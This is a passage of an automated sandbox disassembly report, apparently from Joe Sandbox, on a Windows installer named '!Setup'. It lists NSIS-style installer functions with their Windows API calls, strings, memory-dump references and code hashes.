GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

N, xrefs: 00404C32
@, xrefs: 00404BBC
, xrefs: 00404F65
M, xrefs: 00404B6F

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

Delete: DeleteFile failed("%s"), xrefs: 00406E29
Delete: DeleteFile("%s"), xrefs: 00406DE8
\*.*, xrefs: 00406D2F
ptF, xrefs: 00406D1A
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D79,759223A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33
%s: failed opening file "%s", xrefs: 00406F38

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D79,759223A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427D79,759223A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406A7F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
F, xrefs: 00406858

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
